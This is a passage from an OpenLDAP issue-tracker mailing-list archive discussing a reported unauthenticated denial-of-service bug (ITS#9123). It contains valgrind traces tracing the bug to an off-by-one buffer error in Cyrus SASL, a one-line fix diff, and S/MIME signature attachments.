> datalen=3D0
> =3D=3D11019=3D=3D Thread 3:
> =3D=3D11019=3D=3D Invalid write of size 1
> =3D=3D11019=3D=3D at 0x4B9B1DB: sasl_seterror (seterror.c:247)
> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11=
85)
> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:=
1342)
> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c=
:1048)
> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)
> =3D=3D11019=3D=3D by 0x4EFA322: clone (clone.S:95)
> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size 6=
00 alloc'd
> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gn=
u/valgrind/vgpreload_memcheck-amd64-linux.so)
> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186)
> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196)
> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11=
85)
> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:=
1342)
> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c=
:1048)
> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)
> =3D=3D11019=3D=3D
> =3D=3D11019=3D=3D Invalid read of size 1
> =3D=3D11019=3D=3D at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu=
/valgrind/vgpreload_memcheck-amd64-linux.so)
> =3D=3D11019=3D=3D by 0x4E53DE4: __vfprintf_internal (vfprintf-intern=
al.c:1688)
> =3D=3D11019=3D=3D by 0x4E67029: __vsnprintf_internal (vsnprintf.c:11=
4)
> =3D=3D11019=3D=3D by 0x3A1FFA: lutil_debug (debug.c:74)
> =3D=3D11019=3D=3D by 0x266FF3: slap_sasl_log (sasl.c:146)
> =3D=3D11019=3D=3D by 0x4B9B4CF: sasl_seterror (seterror.c:260)
> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11=
85)
> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:=
1342)
> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size 6=
00 alloc'd
> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gn=
u/valgrind/vgpreload_memcheck-amd64-linux.so)
> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186)
> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196)
> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:11=
85)
> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c:=
1342)
> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c=
:1048)
> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)
--------------ms050304040807030706080402
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC
C5owggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQsw
CQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoM
GkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBB
dXRoZW50aWNhdGlvbiBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwx
GjAYBgNVBAMMEXN0ZXBoYW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAmniYbaUHSdjBF3/m+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4D
A1Tc/an6lONwAeBgj541N7aKSTxRphKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKa
GkjQo2Gr3GRSfVDNLP/n70H8uthbgwPLuBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/
ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUzek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2
LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6XIde5lvA0zR7hhb63HKUVewIDAQABo4IC
IDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+YPz4bKc9Pdeuk6F5Ao+zdCk79TBL
BggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9jYWNlcnQuYWN0YWxpcy5pdC9j
ZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBoYW5Ac3JsYWJzLmRlMEcG
A1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8vd3d3LmFjdGFsaXMu
aXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwgegGA1Ud
HwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUzZEFjdGFs
aXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMlMjBT
LnAuQS4vMDMzNTg1MjA5NjcsYyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7Ymlu
YXJ5MD2gO6A5hjdodHRwOi8vY3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEhDTC1H
MS9nZXRMYXN0Q1JMMB0GA1UdDgQWBBSM25yar8W0HyQ52pQLvwam2PQI1zAOBgNVHQ8BAf8E
BAMCBaAwDQYJKoZIhvcNAQELBQADggEBADvK449WtB/GFtNr0TNrTnaNbtSuPz5poGt7nyUb
neGYazzxvjBPI0a0A+h/++rHcAuYrCNP+/M0PWU3Jv4IDf6YwHGRQdXN4f9xhCtmBnFtfQ22
9anlEBvLZv5uEQSzZ6qhvZkqnq9WQ/ofb9q2GGwPfKa+QM4T8QFv5ZmogdXriH3gf4gJ1fbW
7Ig33y+xYXr8W4lQ3haAShGzV/FleypHafb/3ptGWNq3+diGKPxNpyU1BMq904OPAEBMCa5i
8+8kYsT8ug+t2uSqboWrutgr/y4bYxBrY56cdfgnLBqoHPEBkg8ONHMgiULphoOelPbOjHD0
by5aiDvNToIkdX4wggZHMIIEL6ADAgECAggs1IrTsR4PiTANBgkqhkiG9w0BAQsFADBrMQsw
CQYDVQQGEwJJVDEOMAwGA1UEBwwFTWlsYW4xIzAhBgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAz
MzU4NTIwOTY3MScwJQYDVQQDDB5BY3RhbGlzIEF1dGhlbnRpY2F0aW9uIFJvb3QgQ0EwHhcN
MTUwNTE0MDcxNDE1WhcNMzAwNTE0MDcxNDE1WjCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgM
Bk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1
ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDA/MGJVtmI4vQEZb/NCTWrKCkw/gzK
9yerHBHuhj1d5PVsRLYMVzOVl96Iio0tqduTKpPHJ1dn6TGhL3TvWpaxnrNL6nFKpcuz5FO+
d0RpbHmF0dlwo1YbOHLkWI7gZm8aUUicUSJpj504SmONa9J5em9wOmdjDoz0Be4ejgmGMLc/
84r//lAVefO1NriJTrpGku145OAK2JELBk0rHwQV6qp9Oli98Rvgf3UTuf5jrWObR3YTx8nb
AZNpJLCNzydMjYCle6OhzO6RvaQerBoY/erlS551ZydFlzrldSEr9norfYq+tC40/fYX/kzG
S8QOcmlSee32IwTG8TOffXMNAgMBAAGjggHVMIIB0TBBBggrBgEFBQcBAQQ1MDMwMQYIKwYB
BQUHMAGGJWh0dHA6Ly9vY3NwMDUuYWN0YWxpcy5pdC9WQS9BVVRILVJPT1QwHQYDVR0OBBYE
FH5g/Phspz09166ToXkCj7N0KTv1MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiI
OsifeGbtifN7OHCUyQICNtAwRQYDVR0gBD4wPDA6BgRVHSAAMDIwMAYIKwYBBQUHAgEWJGh0
dHBzOi8vd3d3LmFjdGFsaXMuaXQvYXJlYS1kb3dubG9hZDCB4wYDVR0fBIHbMIHYMIGWoIGT
oIGQhoGNbGRhcDovL2xkYXAwNS5hY3RhbGlzLml0L2NuJTNkQWN0YWxpcyUyMEF1dGhlbnRp
Y2F0aW9uJTIwUm9vdCUyMENBLG8lM2RBY3RhbGlzJTIwUy5wLkEuJTJmMDMzNTg1MjA5Njcs
YyUzZElUP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q7YmluYXJ5MD2gO6A5hjdodHRwOi8v
Y3JsMDUuYWN0YWxpcy5pdC9SZXBvc2l0b3J5L0FVVEgtUk9PVC9nZXRMYXN0Q1JMMA4GA1Ud
DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEATZPO1SS+QRtKFlhzX2WJ8tl6PliMvMvE
D+VbFmeywUukM/JJ/Myad3PcXTpLnWW3AN75uVPByl3NSXczZqUofds6vznmS71Gvq553Jr4
cZBRPQ6GoOjYrYIAT2cFx8A3GJ+N9PxfMKgLdy1/27HeiDVa4TxZNwtkqAIy41EGYm170LhS
DTDeJeo/Orwq5FGhs0qp10+OTcSIr5AD4QUIKRrXE4uH/tw8ZMkw21rX/S7mguJdo4Ad4Au3
+ep5naRn6WLMryhO/iKflq8h/d6Vregvq+vClNxrtNnFNf3R7zTl1lA3ipFU909usGVa02jM
ftJ0t4utyg3yXYRc7rX3QYAlh3KdNzYToTKstUZwMpRf3VWYJJGuoSmlntbTlNtZEuLr7A+M
DOZOrZdKYp9qOruO5MqCSTDsUUkHKLFrQ11Jmix1BvdWQuobwQ5g5qZkuof6/u5rT66WDsU6
+IVt5nthH15E7zU7wULW4uC62XIYPb4YuOBCey+d4Oxs0BZ+SivL6qoDG9XNfk9JpCnaknnY
BogfUw3WLb+B5FI/zdNEysWTC4gzMOFfEoVC+myk1zX29xOvLOO3A/jGrRY1LhhY9LhT72Zb
5TQKCeyDH18yIk1st+V/mpJvnePcAYeeMr+onM9rf3AVNctcHrjwXfDVB/1Ht5l5NEl8JBj9
8lQxggP2MIID8gIBATCBlzCBgjELMAkGA1UEBhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0G
A1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoG
A1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVudGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W
2P8IBRUwDQYJYIZIAWUDBAIBBQCgggIvMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJ
KoZIhvcNAQkFMQ8XDTE5MTEyODE1MzkyM1owLwYJKoZIhvcNAQkEMSIEILb+contXMUwSpoY
+bjTpOSSD1JRO5NsTR8vITqUHRb3MGwGCSqGSIb3DQEJDzFfMF0wCwYJYIZIAWUDBAEqMAsG
CWCGSAFlAwQBAjAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAw
BwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgagGCSsGAQQBgjcQBDGBmjCBlzCBgjELMAkGA1UE
BhMCSVQxDzANBgNVBAgMBk1pbGFubzEPMA0GA1UEBwwGTWlsYW5vMSMwIQYDVQQKDBpBY3Rh
bGlzIFMucC5BLi8wMzM1ODUyMDk2NzEsMCoGA1UEAwwjQWN0YWxpcyBDbGllbnQgQXV0aGVu
dGljYXRpb24gQ0EgRzECEFyqU5ixSKleGB9W2P8IBRUwgaoGCyqGSIb3DQEJEAILMYGaoIGX
MIGCMQswCQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAh
BgNVBAoMGkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENs
aWVudCBBdXRoZW50aWNhdGlvbiBDQSBHMQIQXKpTmLFIqV4YH1bY/wgFFTANBgkqhkiG9w0B
AQEFAASCAQAjwtYcwMK6NjmGAw3mFwZ4wvD5eQPXdnRQM2NYYUHmd+VgkhX9PB5wLwg3ZphB
KYhlweOqcRkcUUkD/uYR5+UpDN0DHRmSYCYwGyP2rdQ5xWkZ50BAj7wch5D9dFWAafUTMYl0
Zkvoloxv1fslTaEUdMZfxhLa4enf3Jt8IQUaVArKTcwrrLnrOAh4zfT4oKqVMyyMpz5r0mum
l8u3HNDYpMUZV0v0UEB/nCodv5o3NucL1cJph7snGCYX55OeYX6OvkwV0uOwDHiCwLKxN4BY
T3h4HXNRf4tXPLNngnByOznQ11xRvYIANBehYr45Q+3S5O6vW+MORqqI8x0sRHCaAAAAAAAA
--------------ms050304040807030706080402--
3 years, 6 months
Re: (ITS#9123) Unauthenticated remote denial-of-service
by hyc@symas.com
Stephan Zeisberg wrote:
> Hi Howard =E2=80=94
>=20
> Thanks for the quick reply. Will forward the report upstream to Cyrus S=
ASL.
For reference, this fixes the bug:
vielle:/home/software/cyrus-sasl> git diff
diff --git a/lib/common.c b/lib/common.c
index bc3bf1df..9969d6aa 100644
--- a/lib/common.c
+++ b/lib/common.c
@@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen,
if (add=3D=3DNULL) add =3D "(null)";
- addlen=3Dstrlen(add); /* only compute once */
+ addlen=3Dstrlen(add)+1; /* only compute once */
if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=3DSASL_OK)
return SASL_NOMEM;
Git history shows this bug has existed since the code was originally writ=
ten in
ommit 061698456069833e244d66ce33c8f82c2cd63ce3
Author: Rob Siemborski <rjs3(a)andrew.cmu.edu>
Date: Tue Dec 4 01:59:43 2001 +0000
>=20
> Best
>=20
> =C2=A0=C2=A0=C2=A0 -Stephan
>=20
> On 11/28/19 3:54 PM, Howard Chu wrote:
>> Resending with the non-printable chars omitted:
>>
>> Howard Chu wrote:
>>> Thanks, but your trace clearly shows that this is a fault in Cyrus SA=
SL, you should be reporting
>>> this issue to them.
>>>
>>> valgrind confirms it as well:
>>>
>>> 5ddfddde do_bind: dn () SASL mech <garbage>
>>> 5ddfddde =3D=3D> sasl_bind: dn=3D"" mech=3D<garbage>
>>> datalen=3D0
>>> =3D=3D11019=3D=3D Thread 3:
>>> =3D=3D11019=3D=3D Invalid write of size 1
>>> =3D=3D11019=3D=3D at 0x4B9B1DB: sasl_seterror (seterror.c:247)
>>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:=
1185)
>>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.=
c:1342)
>>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool=
.c:1048)
>>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479=
)
>>> =3D=3D11019=3D=3D by 0x4EFA322: clone (clone.S:95)
>>> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size=
600 alloc'd
>>> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-=
gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>>> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186)
>>> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196)
>>> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:=
1185)
>>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.=
c:1342)
>>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool=
.c:1048)
>>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479=
)
>>> =3D=3D11019=3D=3D
>>> =3D=3D11019=3D=3D Invalid read of size 1
>>> =3D=3D11019=3D=3D at 0x483DF54: strlen (in /usr/lib/x86_64-linux-g=
nu/valgrind/vgpreload_memcheck-amd64-linux.so)
>>> =3D=3D11019=3D=3D by 0x4E53DE4: __vfprintf_internal (vfprintf-inte=
rnal.c:1688)
>>> =3D=3D11019=3D=3D by 0x4E67029: __vsnprintf_internal (vsnprintf.c:=
114)
>>> =3D=3D11019=3D=3D by 0x3A1FFA: lutil_debug (debug.c:74)
>>> =3D=3D11019=3D=3D by 0x266FF3: slap_sasl_log (sasl.c:146)
>>> =3D=3D11019=3D=3D by 0x4B9B4CF: sasl_seterror (seterror.c:260)
>>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:=
1185)
>>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.=
c:1342)
>>> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size=
600 alloc'd
>>> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-=
gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>>> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186)
>>> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196)
>>> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:=
1185)
>>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.=
c:1342)
>>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool=
.c:1048)
>>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479=
)
>>>
>>>
>>>
>>>
>>
>=20
--=20
-- Howard Chu
CTO, Symas Corp. http://www.symas.com
Director, Highland Sun http://highlandsun.com/hyc/
Chief Architect, OpenLDAP http://www.openldap.org/project/
3 years, 6 months
Re: (ITS#9123) Unauthenticated remote denial-of-service
by stephan@srlabs.de
--------------ms000905070707070901010503
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Content-Language: en-US
Hi Howard =E2=80=94
Thanks for the quick reply. Will forward the report upstream to Cyrus SAS=
L.
Best
=C2=A0=C2=A0=C2=A0 -Stephan
On 11/28/19 3:54 PM, Howard Chu wrote:
> Resending with the non-printable chars omitted:
>
> Howard Chu wrote:
>> Thanks, but your trace clearly shows that this is a fault in Cyrus SAS=
L, you should be reporting
>> this issue to them.
>>
>> valgrind confirms it as well:
>>
>> 5ddfddde do_bind: dn () SASL mech <garbage>
>> 5ddfddde =3D=3D> sasl_bind: dn=3D"" mech=3D<garbage>
>> datalen=3D0
>> =3D=3D11019=3D=3D Thread 3:
>> =3D=3D11019=3D=3D Invalid write of size 1
>> =3D=3D11019=3D=3D at 0x4B9B1DB: sasl_seterror (seterror.c:247)
>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1=
185)
>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c=
:1342)
>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.=
c:1048)
>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)=
>> =3D=3D11019=3D=3D by 0x4EFA322: clone (clone.S:95)
>> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size =
600 alloc'd
>> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-g=
nu/valgrind/vgpreload_memcheck-amd64-linux.so)
>> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186)
>> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196)
>> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1=
185)
>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c=
:1342)
>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.=
c:1048)
>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)=
>> =3D=3D11019=3D=3D
>> =3D=3D11019=3D=3D Invalid read of size 1
>> =3D=3D11019=3D=3D at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gn=
u/valgrind/vgpreload_memcheck-amd64-linux.so)
>> =3D=3D11019=3D=3D by 0x4E53DE4: __vfprintf_internal (vfprintf-inter=
nal.c:1688)
>> =3D=3D11019=3D=3D by 0x4E67029: __vsnprintf_internal (vsnprintf.c:1=
14)
>> =3D=3D11019=3D=3D by 0x3A1FFA: lutil_debug (debug.c:74)
>> =3D=3D11019=3D=3D by 0x266FF3: slap_sasl_log (sasl.c:146)
>> =3D=3D11019=3D=3D by 0x4B9B4CF: sasl_seterror (seterror.c:260)
>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1=
185)
>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c=
:1342)
>> =3D=3D11019=3D=3D Address 0x62032a8 is 0 bytes after a block of size =
600 alloc'd
>> =3D=3D11019=3D=3D at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-g=
nu/valgrind/vgpreload_memcheck-amd64-linux.so)
>> =3D=3D11019=3D=3D by 0x4B930A4: _buf_alloc (common.c:2186)
>> =3D=3D11019=3D=3D by 0x4B93299: _sasl_add_string (common.c:196)
>> =3D=3D11019=3D=3D by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>> =3D=3D11019=3D=3D by 0x4B9A18D: sasl_server_start (server.c:1418)
>> =3D=3D11019=3D=3D by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> =3D=3D11019=3D=3D by 0x21E130: fe_op_bind (bind.c:279)
>> =3D=3D11019=3D=3D by 0x21DCE1: do_bind (bind.c:205)
>> =3D=3D11019=3D=3D by 0x1F35BA: connection_operation (connection.c:1=
185)
>> =3D=3D11019=3D=3D by 0x1F3CE7: connection_read_thread (connection.c=
:1342)
>> =3D=3D11019=3D=3D by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.=
c:1048)
>> =3D=3D11019=3D=3D by 0x4DBE668: start_thread (pthread_create.c:479)=
>>
>>
>>
>>
>
--------------ms000905070707070901010503
Content-Type: application/pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFADCABgkqhkiG9w0BBwEAAKCC
C5owggVLMIIEM6ADAgECAhBcqlOYsUipXhgfVtj/CAUVMA0GCSqGSIb3DQEBCwUAMIGCMQsw
CQYDVQQGEwJJVDEPMA0GA1UECAwGTWlsYW5vMQ8wDQYDVQQHDAZNaWxhbm8xIzAhBgNVBAoM
GkFjdGFsaXMgUy5wLkEuLzAzMzU4NTIwOTY3MSwwKgYDVQQDDCNBY3RhbGlzIENsaWVudCBB
dXRoZW50aWNhdGlvbiBDQSBHMTAeFw0xOTA1MjQwODA3MTdaFw0yMDA1MjQwODA3MTdaMBwx
GjAYBgNVBAMMEXN0ZXBoYW5Ac3JsYWJzLmRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAmniYbaUHSdjBF3/m+2PVN14GEGxOSwHtd8WxH9mUXKEIW4XuImwNz8AoGfFOHc4D
A1Tc/an6lONwAeBgj541N7aKSTxRphKnrJrpJarbUR2FM7u7Km7btUTBT9mm6OmympB+vWKa
GkjQo2Gr3GRSfVDNLP/n70H8uthbgwPLuBfBt/dLHFrvYBpPtnH2EQqKc1SELSUPAuo9zaO/
ohwPb7Sss3vMOOtePGL0lcHjWCbdsstZ/DUzek9MQ6F+PkGYee3JSzvyXvrADheqUPHtYPd2
LPu6hZKbAGjoqRYHVbwITZIzu7QWB4YEXFCdMT6XIde5lvA0zR7hhb63HKUVewIDAQABo4IC
IDCCAhwwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBR+YPz4bKc9Pdeuk6F5Ao+zdCk79TBL
BggrBgEFBQcBAQQ/MD0wOwYIKwYBBQUHMAKGL2h0dHA6Ly9jYWNlcnQuYWN0YWxpcy5pdC9j
ZXJ0cy9hY3RhbGlzLWF1dGNsaWcxMBwGA1UdEQQVMBOBEXN0ZXBoYW5Ac3JsYWJzLmRlMEcG
A1UdIARAMD4wPAYGK4EfARgBMDIwMAYIKwYBBQUHAgEWJGh0dHBzOi8vd3d3LmFjdGFsaXMu
aXQvYXJlYS1kb3dubG9hZDAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwQwgegGA1Ud
HwSB4DCB3TCBm6CBmKCBlYaBkmxkYXA6Ly9sZGFwMDUuYWN0YWxpcy5pdC9jbiUzZEFjdGFs
aXMlMjBDbGllbnQlMjBBdXRoZW50aWNhdGlvbiUyMENBJTIwRzEsbyUzZEFjdGFsaXMlMjBT
